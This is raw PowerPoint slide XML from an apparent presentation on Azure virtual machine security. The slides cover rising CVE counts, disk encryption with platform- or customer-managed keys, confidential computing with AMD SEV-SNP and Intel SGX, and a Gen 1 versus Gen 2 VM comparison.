                    <a:pt x="138" y="35"/>
                    <a:pt x="128" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="127"/>
                    <a:pt x="46" y="127"/>
                    <a:pt x="46" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="132"/>
                    <a:pt x="34" y="135"/>
                    <a:pt x="28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06" name="Freeform 118">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2680BFBE-F880-694C-BEE0-1E4696459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0450" y="317500"/>
              <a:ext cx="58738" cy="55563"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 138"/>
                <a:gd name="T1" fmla="*/ 135 h 135"/>
                <a:gd name="T2" fmla="*/ 10 w 138"/>
                <a:gd name="T3" fmla="*/ 128 h 135"/>
                <a:gd name="T4" fmla="*/ 10 w 138"/>
                <a:gd name="T5" fmla="*/ 92 h 135"/>
                <a:gd name="T6" fmla="*/ 92 w 138"/>
                <a:gd name="T7" fmla="*/ 10 h 135"/>
                <a:gd name="T8" fmla="*/ 128 w 138"/>
                <a:gd name="T9" fmla="*/ 10 h 135"/>
                <a:gd name="T10" fmla="*/ 128 w 138"/>
                <a:gd name="T11" fmla="*/ 45 h 135"/>
                <a:gd name="T12" fmla="*/ 46 w 138"/>
                <a:gd name="T13" fmla="*/ 128 h 135"/>
                <a:gd name="T14" fmla="*/ 28 w 138"/>
                <a:gd name="T1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135">
                  <a:moveTo>
                    <a:pt x="28" y="135"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="135"/>
                    <a:pt x="15" y="133"/>
                    <a:pt x="10" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="118"/>
                    <a:pt x="0" y="102"/>
                    <a:pt x="10" y="92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102" y="0"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="128" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="20"/>
                    <a:pt x="138" y="36"/>
                    <a:pt x="128" y="45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1" y="133"/>
                    <a:pt x="34" y="135"/>
                    <a:pt x="28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8709" tIns="19354" rIns="38709" bIns="1935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76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145" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B365831C-2BEF-4ED9-A24B-5593EF6662A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471771" y="531341"/>
            <a:ext cx="11018520" cy="49244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sz="3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+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>2021/2022 – The years we got new sad records...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="CVE Daily Average-1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68DA87C6-DCCF-4768-8FAA-FB3C34D40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861" y="2888898"/>
            <a:ext cx="4376621" cy="32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88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26311BAF-DE06-4A8F-82CB-4FE6405FAF60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8889738" y="1214854"/>
            <a:ext cx="2866369" cy="180256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0B86A8-EE27-4275-8130-A58DB995A99A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9163735" y="1438521"/>
            <a:ext cx="2425415" cy="730205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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kstSylinder 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63FF5CA-EE6B-4581-8D36-8253D0F65E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10082637" y="1629736"/>
            <a:ext cx="1281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Storage Disk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle: Rounded Corners 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC0CB7DC-8FE7-4153-A94A-820604DE0679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5196950" y="1229107"/>
            <a:ext cx="2369802" cy="263027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7CC26D-122C-45DB-BF51-39C27532617C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5381142" y="1445100"/>
            <a:ext cx="1585399" cy="776253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4FDE905-C2AB-4AAF-87F4-CA6AB3E7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558" y="1528792"/>
            <a:ext cx="704850" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TekstSylinder 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{718C8F28-016F-458B-B0F3-7F928752872B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314296" y="1663727"/>
            <a:ext cx="1281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VM01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44A7BC-0021-4038-9342-BE726DC59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588" y="1562689"/>
            <a:ext cx="552450" cy="533400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00D8B663-50A6-426A-BFFA-F157974BDF3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6999434" y="1379316"/>
            <a:ext cx="2144565" cy="616590"/>
          </a:xfrm>
          <a:prstGeom prst="right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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read/Write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59A1CA-A45B-4A6C-A707-1B47AC43E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129" y="1994878"/>
            <a:ext cx="666750" cy="6667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527CF46-AE58-4793-B1CA-6385E4870F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9262414" y="2181883"/>
            <a:ext cx="259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SSE </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0"/>
              <a:t>(Storage Service Encryption)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0"/>
              <a:t>Platform Managed Keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1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B931ECE-8DB7-4C95-BA69-084BBE4742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6457" y="949550"/>
            <a:ext cx="4286253" cy="5661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All data encrypted physically on storage nodes with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Bitlocker</a:t>
            </a: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dirty="0"/>
              <a:t>Keys Managed by Microsoft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(Platform Managed Keys – PMK)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Customer-Managed (CMK) keys using </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>KeyVault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Can also deploy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>KeyVault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> with dedicated HSM solution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Ensures securing disks physically in the datacenter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1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A8D8FC-ABC3-4D56-9637-69DE3ED1B94F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5446929" y="2997608"/>
            <a:ext cx="1906817" cy="636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0A1B3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bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Physical Server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D8DD5D8E-99AA-4697-8E55-505326D5D4E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5467491" y="2433782"/>
            <a:ext cx="685799" cy="381548"/>
          </a:xfrm>
          <a:prstGeom prst="right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8395B9-7EFC-4564-B9BC-31E9E8C7055D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5976938" y="2443581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Generation 1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rectangle: Rounded Corners 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45A8458C-F914-4955-A87B-134566D8660D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8889738" y="3696451"/>
            <a:ext cx="2866369" cy="15113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2D6CF1-ED2E-47D1-8970-B9170031413C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9163735" y="3920117"/>
            <a:ext cx="2425415" cy="730205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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TekstSylinder 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E114A0F6-DCF0-4E23-9888-68194B995347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10082637" y="4111332"/>
            <a:ext cx="1281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Storage Disk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945CE1D-5DC2-4AC2-8A2A-EDEEC8207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588" y="4044285"/>
            <a:ext cx="552450" cy="533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CFD9BE5-5956-415E-9C65-33DC70105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679" y="5244824"/>
            <a:ext cx="666750" cy="66675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4815D1A-29D6-44FB-A6D4-37FFEC721959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9262414" y="4663479"/>
            <a:ext cx="259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SSE </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0"/>
              <a:t>(Storage Service Encryption)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr 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3D3809-EA91-475F-BAA4-F44BEDCE8CF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9398000" y="543153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200" b="1" dirty="0"/>
              <a:t>Customer Managed Keys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5E92B5-6CF2-4BF1-A43C-376010153C8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1118602" y="327049"/>
            <a:ext cx="9551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4000" b="1" dirty="0"/>
              <a:t>Disk Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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77CF9-9AC2-49D8-9B89-BAF58524961A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9875921" y="3188369"/>
            <a:ext cx="231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Or...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00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/>
      <p:bldP spid="52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26311BAF-DE06-4A8F-82CB-4FE6405FAF60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8889738" y="2419348"/>
            <a:ext cx="2866369" cy="180256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0B86A8-EE27-4275-8130-A58DB995A99A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9163735" y="2643015"/>
            <a:ext cx="2425415" cy="730205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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kstSylinder 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63FF5CA-EE6B-4581-8D36-8253D0F65E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10082637" y="2834230"/>
            <a:ext cx="1281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Storage Disk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle: Rounded Corners 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC0CB7DC-8FE7-4153-A94A-820604DE0679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5196950" y="1212850"/>
            <a:ext cx="2369802" cy="38510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7CC26D-122C-45DB-BF51-39C27532617C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5381142" y="1625600"/>
            <a:ext cx="1585399" cy="1800247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4FDE905-C2AB-4AAF-87F4-CA6AB3E7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558" y="2733286"/>
            <a:ext cx="704850" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TekstSylinder 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{718C8F28-016F-458B-B0F3-7F928752872B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314296" y="2868221"/>
            <a:ext cx="1281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VM01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44A7BC-0021-4038-9342-BE726DC59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588" y="2767183"/>
            <a:ext cx="552450" cy="533400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00D8B663-50A6-426A-BFFA-F157974BDF3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6999435" y="2583810"/>
            <a:ext cx="2085360" cy="861772"/>
          </a:xfrm>
          <a:prstGeom prst="right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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read/Write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59A1CA-A45B-4A6C-A707-1B47AC43E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923" y="3409881"/>
            <a:ext cx="666750" cy="6667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527CF46-AE58-4793-B1CA-6385E4870F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9262414" y="3386377"/>
            <a:ext cx="259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SSE </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0"/>
              <a:t>(Storage Service Encryption)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0"/>
              <a:t>Platform Managed Keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1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B931ECE-8DB7-4C95-BA69-084BBE4742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3713" y="1149074"/>
            <a:ext cx="4195013" cy="5067910"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Azure Disk Encryption for encryption of VHD files and OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Adds 3 – 5% CPU usage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Confidential Computing for encryption of working memory of the VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>AMD SEV-SNP or Intel SGX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Intel SGX requires rewriting of applications to use new CPU instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>AMD SEV-SNP does not require modifications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2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A8D8FC-ABC3-4D56-9637-69DE3ED1B94F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5446929" y="4202102"/>
            <a:ext cx="1906817" cy="636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0A1B3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bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>AMD SEV-SNP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="14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nb-NO" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Confidential Computing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D8DD5D8E-99AA-4697-8E55-505326D5D4E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5467491" y="3638276"/>
            <a:ext cx="685799" cy="381548"/>
          </a:xfrm>
          <a:prstGeom prst="right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6F334-6058-4C29-B162-8862737CD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000" y="1825625"/>
            <a:ext cx="800100" cy="438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75D4BA-4DED-4A66-A791-7DBFF9871A59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6235700" y="1847850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Minne</a:t>
            </a:r>
            <a:endParaRPr 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C9608-8226-49C2-BAF2-C1B0A7097742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5664200" y="1238250"/>
            <a:ext cx="15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Kryptert miljø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13D8A1-5A4E-4302-96D0-7A5F9A2C9160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250950" y="314349"/>
            <a:ext cx="9551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4000" b="1" dirty="0"/>
              <a:t>Disk and OS Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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E2703E-2F60-40A5-B06F-E8CDB5D10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139" y="2233441"/>
            <a:ext cx="666750" cy="666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16BB8F-E96C-451F-882B-2E036018B2BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7815160" y="1907741"/>
            <a:ext cx="157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8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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3458744" y="266891"/>
            <a:ext cx="9551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b="1" dirty="0"/>
              <a:t>Gen 1 vs Gen 2 - VM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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BCFE332-D44D-4294-8666-8523C2E6E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24480"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5058945" y="1450250"/>
          <a:ext cx="62865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699">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="333350287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946069980"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2374901">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2196946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600" dirty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Generation 1 VM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Generation 2 VM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8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b="1" dirty="0"/>
                        <a:t>Boot type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PCAT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UEFI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9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b="1" dirty="0"/>
                        <a:t>Disk Controllers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IDE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SCSI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48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b="1" dirty="0"/>
                        <a:t>VM Typer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Almost everyone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Almost everyone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5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b="1" dirty="0"/>
                        <a:t>OS Disk &gt; 2 TB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87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b="1" dirty="0"/>
                        <a:t>Price difference?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66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b="1" dirty="0"/>
                        <a:t>Support VHDX?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9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b="1" dirty="0"/>
                        <a:t>VBS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92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b="1" dirty="0"/>
                        <a:t>Trusted Launch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3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b="1" dirty="0"/>
                        <a:t>vTPM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/>
                        <a:t>NO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41697"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl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AC413AF-CB46-41C3-A839-245552650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663" y="1072540"/>
            <a:ext cx="4102437" cy="4782160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" b="1" dirty="0"/>
              <a:t>Use Gen 2 wherever possible!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" b="1" dirty="0"/>
              <a:t>Cannot migrate from Gen 1 to Gen 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" b="1" dirty="0"/>
              <a:t>Solution? Create new VM with existing source disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" b="1" dirty="0"/>
              <a:t>Not all VM types support Gen 2 yet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
              <a:t>Some GPU instances</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" b="1" dirty="0"/>
              <a:t>VBS = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0"/>
              <a:t>Support for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>Credential Guard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>Trusted Boot (does not work with Site Recovery or Shared/Ultra Disks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" strike="sngStrike" dirty="0"/>
              <a:t>Application Guard </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>VM Attestation service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p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382858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C09C5FC-EA32-47A5-8FEE-7FA0FE51C930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669399" y="2802406"/>
            <a:ext cx="6267171" cy="3111592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
